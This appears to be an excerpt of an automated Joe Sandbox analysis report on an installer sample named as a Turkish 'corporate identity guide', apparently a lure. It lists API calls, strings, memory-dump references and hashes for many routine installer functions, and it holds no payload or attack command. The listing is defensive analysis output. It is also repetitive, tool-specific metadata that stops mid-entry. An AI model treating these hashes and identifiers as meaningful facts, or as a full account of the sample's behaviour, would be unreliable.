                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsq53F5.tmp$C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll
                                                                                                                                                                                          • API String ID: 3109718747-866267152
                                                                                                                                                                                          • Opcode ID: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                                                          • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                                                                                                                                                          • Opcode Fuzzy Hash: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D2394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D24D6
                                                                                                                                                                                            • Part of subcall function 6F3D122C: lstrcpynW.KERNEL32(00000000,?,6F3D12DF,00000019,6F3D11BE,-000000A0), ref: 6F3D123C
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 6F3D245C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F3D2477
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                          • Opcode ID: 4fa17434b08947be1f462149a923ba1df5241d81b0f803e99a07e8575657d9f8
                                                                                                                                                                                          • Instruction ID: 72cbbfc6825863e7d870d8456dc0c042332e244214207a15f76be6d38536a78f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fa17434b08947be1f462149a923ba1df5241d81b0f803e99a07e8575657d9f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D41ACB2008705DFD710EF38DA44A66B7BCFB5A324B004A5EF88687581EB71E595CB71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                          • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                          • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                                                                                                                                          • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                          • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                                                          • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                          • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                          • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                          • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                          • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                                                                                                                                          • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405B8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405BB1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                          • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                          • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                          • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                          • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                                                                                          • Opcode ID: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                                                                                                                                                                          • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                                                                                                                                                                          • Opcode Fuzzy Hash: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                          • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                          • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403915 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76FC3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                                                                          • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                                                          • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                                                                                                                                                                          • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
